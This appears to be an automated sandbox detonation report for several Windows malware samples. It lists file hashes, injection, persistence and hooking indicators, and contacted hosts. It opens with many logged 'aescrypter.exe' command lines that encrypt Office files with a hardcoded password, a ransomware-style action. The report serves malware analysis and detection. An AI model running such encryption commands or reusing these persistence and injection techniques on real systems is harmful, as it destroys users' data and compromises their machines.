C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABMASK.BMP.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABMASK.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABOFF.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABOFF.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABON.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WhiteboxMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WhiteboxMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Messenger.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Messenger.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterApplicationDescriptors.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterApplicationDescriptors.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterNotificationDescriptors.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\StarterNotificationDescriptors.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Microsoft.Office.InfoPath.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Microsoft.Office.InfoPath.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\Microsoft.Office.InfoPath.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\Microsoft.Office.InfoPath.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\IPIRM.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\IPIRM.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\IPIRMV.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\IPIRMV.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\JFONT.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\JFONT.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\LOOKUP.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\LOOKUP.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.BusinessData.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.BusinessData.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.Runtime.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessData.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessData.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
Network
Files
\Windows\SysWOW64\dcomcnfgui.exe
| MD5 | 17fa49e023cb95cdfe365abc0d7290d0 |
| SHA1 | 5a94bbd98de20bbb415b7378226490e220d8cf83 |
| SHA256 | ec855befa1b088809f15cf08266ae576d1885cb8374f69fcb936094341ae7675 |
| SHA512 | a1e9c82f88fec277b2446c2f2f64c6c43c3b72d9f2a84d04ae4e7ea3d4e2f1283f9b5fbebf5611ccb4132a49e99532b92ca9db875cfb4cd5e825c42a5ba1924f |
\Windows\SysWOW64\ucsvcsh.exe
| MD5 | 625ba9cf557dbb1ffac001e2a0300d32 |
| SHA1 | bf0fe5fdd91cdb849dd36fd9a017aa08ae8e0907 |
| SHA256 | d80adafe8c367753dd7e6cb282ef55af4257b6a9d06ac8aa1300f2cda9ade46c |
| SHA512 | dec748b7d46d42beebb1a5a83e771de9b3c2c06a5e67a48ce4d2f49d0dd2d846baaf8fba78e698f00da9901706433fa34f4e25c7734049ee5904c591ad8c0000 |
C:\Windows\SysWOW64\csrsstub.exe
| MD5 | 6f36e46b83a61a5e251460ad825f425e |
| SHA1 | 8206aeb2bf3f9fe1ef2602a0b34138c170a888e5 |
| SHA256 | 35e03b690797208e0bedaa29a6decf78ac43236e89dd7f98f96962f8df86037e |
| SHA512 | 5fed7460b588217c284123add5f3c57a4f24c23a3f8b8dc7875768b8b880a67c854e230da0322a7dc9e0f295a4bbbc568d2c260e5fcad22f2d59cec24289a387 |
C:\Windows\SysWOW64\tcpsvcss.exe
| MD5 | 9225773aa6641d29ac88ca5eb6baeccf |
| SHA1 | 6120d219c2afca4b262ce07fb56cd260d9d17696 |
| SHA256 | 7ae63718b10429d82d5c510ed03ad855d7b997a32f74bbb3062c7dea01ea7c0c |
| SHA512 | c94fbdf29cc024ae9268203ddc8dd325466242c93a55ef51df82775f213597ab92ee0a6c109dcccdc109056781505bf92b8a53de7ae5f0a9387bebe8b269f928 |
C:\Windows\SysWOW64\tracerpts.exe
| MD5 | 53894890dc01bbcace449f6590a1597b |
| SHA1 | b27c93ef650d79a49150e61cd668b01bee543a30 |
| SHA256 | 2f3f037b07737101076f50664ea3af10f76970febdcba4bd0e38d5a0eca4f6dd |
| SHA512 | 2ab1d894688ba8ee4129c575a116e7d01840d553a3956c3c158921e0794207ae9d0396c4c848c9e6592f40466e893ed19165e5eb34c53e02fe19fb65265c3a5a |
C:\Windows\SysWOW64\wcmtstcsys.sss
| MD5 | 9abaa20254e67cec16013d1b4a01e273 |
| SHA1 | 7a9e0ab51b32ab6368d99108bbf3e1ffdbd52c92 |
| SHA256 | 0d342414df89f312016376cb8b8ecd5a4b5c5d6484ba72a926f61503e6717c57 |
| SHA512 | 76a3542176728d052233fd197e826c8bf61d525afc5a7d5c9a823e2f8a04f873f22e38647c5751413f095dc96175ea56bacec66465575f450489dae4109e0ca4 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
119s
Max time network
124s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock1.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock1.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock1.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock1.exe
"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock1.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gltsapi.coetech.com | udp |
| US | 199.59.243.227:80 | gltsapi.coetech.com | tcp |
Files
memory/1792-0-0x000007FEF5573000-0x000007FEF5574000-memory.dmp
memory/1792-1-0x0000000001280000-0x00000000012EE000-memory.dmp
memory/1792-2-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp
memory/1792-3-0x000007FEF5573000-0x000007FEF5574000-memory.dmp
memory/1792-4-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
123s
Max time network
124s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock2.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock2.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock2.exe
"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.WindowsLock2.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gltsapi.coetech.com | udp |
| US | 199.59.243.227:80 | gltsapi.coetech.com | tcp |
Files
memory/2172-0-0x000007FEF6543000-0x000007FEF6544000-memory.dmp
memory/2172-1-0x00000000013C0000-0x000000000142E000-memory.dmp
memory/2172-2-0x000007FEF6540000-0x000007FEF6F2C000-memory.dmp
memory/2172-3-0x000007FEF6543000-0x000007FEF6544000-memory.dmp
memory/2172-4-0x000007FEF6540000-0x000007FEF6F2C000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
240s
Max time network
122s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe | N/A |
| N/A | N/A | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe | N/A |
| N/A | N/A | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (5).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (5).exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe" | C:\Users\Admin\AppData\Local\Temp\Setup (5).exe | N/A |
Checks installed software on the system
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.ini | C:\Users\Admin\AppData\Local\Temp\Setup (5).exe | N/A |
| File opened for modification | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe | C:\Users\Admin\AppData\Local\Temp\Setup (5).exe | N/A |
| File opened for modification | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe | C:\Users\Admin\AppData\Local\Temp\Setup (5).exe | N/A |
| File opened for modification | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\Setup (5).exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Setup (5).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (5).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (5).exe"
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"
Network
Files
\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
| MD5 | f33a4e991a11baf336a2324f700d874d |
| SHA1 | 9da1891a164f2fc0a88d0de1ba397585b455b0f4 |
| SHA256 | a87524035509ff7aa277788e1a9485618665b7da35044d70c41ec0f118f3dfd7 |
| SHA512 | edf066968f31451e21c7c21d3f54b03fd5827a8526940c1e449aad7f99624577cbc6432deba49bb86e96ac275f5900dcef8d7623855eb3c808e084601ee1df20 |
memory/2380-28-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2240-29-0x000007FEF5B03000-0x000007FEF5B04000-memory.dmp
memory/2240-30-0x00000000012F0000-0x000000000131E000-memory.dmp
memory/2240-31-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp
memory/2240-32-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp
memory/2240-33-0x000007FEF5B03000-0x000007FEF5B04000-memory.dmp
memory/2240-34-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
| MD5 | 1bb4dd43a8aebc8f3b53acd05e31d5b5 |
| SHA1 | 54cd1a4a505b301df636903b2293d995d560887e |
| SHA256 | a2380a5f503bc6f5fcfd4c72e5b807df0740a60a298e8686bf6454f92e5d3c02 |
| SHA512 | 94c70d592e806bb426760f61122b8321e8dc5cff7f793d51f9d5650821c502c43096f41d3e61207ca6989df5bfdbff57bc23328de16e99dd56e85efc90affdce |
memory/1820-37-0x00000000001C0000-0x0000000000234000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
118s
Max time network
121s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe" | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
Checks installed software on the system
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
| File opened for modification | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
| File created | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.ini | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2008 wrote to memory of 1148 | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe |
| PID 2008 wrote to memory of 1148 | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe |
| PID 2008 wrote to memory of 1148 | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe |
| PID 2008 wrote to memory of 1148 | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (6).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (6).exe"
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
Network
Files
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
| MD5 | d7dccd844047a41ecda204295c4f3743 |
| SHA1 | 21ee4ead319c6cd4b7568fef42da637945b15793 |
| SHA256 | 9db8971c38f1803f7afc80a8c332ca93d69d084f39ea119f9c28c02ee1ed9166 |
| SHA512 | fe249bc49dfa9ea80594370c94b6f1344e91f91d7b378265472706eb35ac6fbeba02c13af95dfebd045cf6ff3a59cb32bc7893dfa686ab15059a6c9a3ac5833a |
memory/2008-24-0x0000000000400000-0x000000000043C000-memory.dmp
memory/1148-26-0x000007FEF5D13000-0x000007FEF5D14000-memory.dmp
memory/1148-27-0x0000000000D40000-0x0000000000D6E000-memory.dmp
memory/1148-28-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp
memory/1148-29-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp
memory/1148-30-0x000007FEF5D13000-0x000007FEF5D14000-memory.dmp
memory/1148-31-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20241010-en
Max time kernel
301s
Max time network
173s
Command Line
Signatures
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\vasja = "C:\\Users\\Admin\\AppData\\Local\\Temp\\upd.exe" | C:\Users\Admin\AppData\Local\Temp\upd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3056 set thread context of 2244 | N/A | C:\Users\Admin\AppData\Local\Temp\upd.exe | C:\Users\Admin\AppData\Local\Temp\upd.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\upd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\upd.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\upd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\upd.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\upd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\upd.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3056 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Local\Temp\upd.exe | C:\Users\Admin\AppData\Local\Temp\upd.exe |
| PID 3056 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Local\Temp\upd.exe | C:\Users\Admin\AppData\Local\Temp\upd.exe |
| PID 3056 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Local\Temp\upd.exe | C:\Users\Admin\AppData\Local\Temp\upd.exe |
| PID 3056 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Local\Temp\upd.exe | C:\Users\Admin\AppData\Local\Temp\upd.exe |
| PID 3056 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Local\Temp\upd.exe | C:\Users\Admin\AppData\Local\Temp\upd.exe |
| PID 3056 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Local\Temp\upd.exe | C:\Users\Admin\AppData\Local\Temp\upd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\upd.exe
"C:\Users\Admin\AppData\Local\Temp\upd.exe"
C:\Users\Admin\AppData\Local\Temp\upd.exe
"C:\Users\Admin\AppData\Local\Temp\upd.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 89.248.165.131:80 | tcp | |
| NL | 89.248.165.131:80 | tcp | |
| US | 8.8.8.8:53 | tools.ip2location.com | udp |
| US | 149.248.7.185:80 | tools.ip2location.com | tcp |
| US | 149.248.7.185:443 | tools.ip2location.com | tcp |
| US | 149.248.7.185:443 | tools.ip2location.com | tcp |
| US | 149.248.7.185:443 | tools.ip2location.com | tcp |
| US | 149.248.7.185:443 | tools.ip2location.com | tcp |
Files
memory/3056-0-0x0000000000401000-0x0000000000402000-memory.dmp
memory/3056-1-0x0000000000400000-0x000000000042B000-memory.dmp
memory/2244-2-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2244-9-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2244-6-0x0000000000400000-0x0000000000420000-memory.dmp
